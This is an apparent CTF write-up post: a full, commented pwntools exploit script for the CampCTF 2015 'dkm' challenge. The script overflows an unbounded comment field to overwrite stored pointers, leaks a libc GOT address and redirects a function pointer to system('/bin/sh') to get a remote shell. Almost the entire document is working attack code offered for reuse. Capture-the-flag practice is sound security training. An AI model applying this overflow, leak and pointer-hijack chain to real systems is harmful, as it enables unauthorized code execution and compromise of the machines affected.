
CAMPCTF 2015 dkm

daehee87 2015. 11. 19. 02:39

#!/usr/bin/env python

from pwn import *

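context.arch = 'amd64'

# The binary is loaded only to read its GOT. The fixed 0x4009F0 address used
# further down suggests a non-PIE image, so GOT slots sit at known addresses.
elf = ELF('dkm.elf')

# GOT slot of __libc_start_main. The name `puts` is historical (the stage-1
# payload refers to it under that name); it never held puts' GOT entry.
puts = elf.got['__libc_start_main']

# One switch instead of commenting/uncommenting two `remote(...)` lines
# when running against a local copy of the service.
LOCAL = False
if LOCAL:
    r = remote("localhost", 5555)
else:
    r = remote("challs.campctf.ccc.ac", 10102)

# Consume the banner up to the first menu prompt.
r.recvuntil('> ')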


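def send_menu(r, s):
    """Send one line of menu input and consume the next prompt.

    Args:
        r: connection object exposing ``send`` and ``recvuntil`` (a pwntools tube here).
        s: menu choice or free-text answer; a newline is appended because the
           service reads line by line.

    Returns:
        Everything the service printed up to and including the next ``'> '``
        prompt, so callers can parse it instead of repeating the send/recv
        pair by hand. The text is still echoed to stdout as before.
    """
    r.send(s + '\n')
    reply = r.recvuntil('> ')
    # print(x) with a single argument behaves the same under Python 2 and 3.
    print(reply)
    return reply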


# Menu walk that puts the service into the state the overflow needs. What
# each choice selects is not visible from this script; the author's only hint
# is that the fifth answer of the first sequence is the "number of ssid".
# The last sequence stops at the prompt where the stage-1 comment is written.
_SETUP_SEQUENCES = (
    ('2', '1', '0', '0', '0', 'no comment'),
    ('4', '0', '2', '0', '0', 'no comment'),
    ('2', '1', '0', '0', '0', 'no comment'),
    ('4', '0', '3', '0', '0', '0'),
)
for sequence in _SETUP_SEQUENCES:
    for choice in sequence:
        send_menu(r, choice)


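# system() - __libc_start_main in the remote libc. The value is tied to the
# target's libc build; the author's note says it was found by brute force.
SYSTEM_OFFSET = 0x23a80

# Address of the binary's own "show with wifi" routine (fixed, non-PIE image).
show_with_wifi = 0x4009F0


# stage1> leak got
# The comment is read without a length limit, so the 0x310 bytes of filler
# (presumably the comment buffer's size) run into the fields stored after it.
# The field order below is inferred from the payload, not from the binary:
# latitude, longitude, a "show" function pointer, an "edit" function pointer,
# then a pointer that the show routine appears to print as the SSID. Pointing
# that last field at the GOT slot makes the next "show" echo the resolved
# address of __libc_start_main. The root cause is the unbounded read; a
# function pointer stored right behind attacker-controlled data is what turns
# it into control-flow hijack rather than a crash.
comment = 'A' * 0x310
comment += pack(0)                # latitude
comment += pack(0)                # longitude
comment += pack(show_with_wifi)   # show with wifi (restored to its original value)
comment += pack(0xdeadbeef)       # edit
comment += pack(puts)             # GOT slot of __libc_start_main (variable name is historical)
comment += pack(0)

r.send(comment + '\n')
print(r.recvuntil('> '))

# Menu choice 1 runs the (still intact) show routine, which prints the leak.
r.send('1\n')
leak = r.recvuntil('> ')
print(leak)

if 'SSID: ' not in leak:
    raise RuntimeError('no "SSID: " in the reply; menu path or field layout differs from the expected one')
leak = leak.split('SSID: ')[1]

# Read the low 6 bytes as a little-endian integer: a canonical amd64 user-space
# address has its top two bytes zero, so only 6 bytes are printed before the
# NUL that terminates the string.
libc_start_addr = u64(leak[:6].ljust(8, '\0'))
system_addr = libc_start_addr + SYSTEM_OFFSET

print('libc_start at -{0}-'.format(hex(libc_start_addr)))
print('system at -{0}-'.format(hex(system_addr)))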


# stage2> jmp to system
# Same menu walk as before the stage-1 comment, ending at the comment prompt.
for choice in ('4', '0', '3', '0', '0', '0'):
    send_menu(r, choice)

# Overwrite the same record again: the "show" function pointer now holds
# system(), and the latitude field (presumably what the show routine passes
# as its first argument) holds "/bin/sh".
comment = ''.join([
    'A' * 0x310,
    '/bin/sh\0',          # latitude -> "/bin/sh"
    pack(0),              # longitude
    pack(system_addr),    # show -> system
    pack(0xdeadbeef),     # edit
    pack(0),
])

r.send(comment + '\n')
print(r.recvuntil('> '))

# Menu choice 1 calls show(), which is now system("/bin/sh").
r.send('1\n')
r.interactive()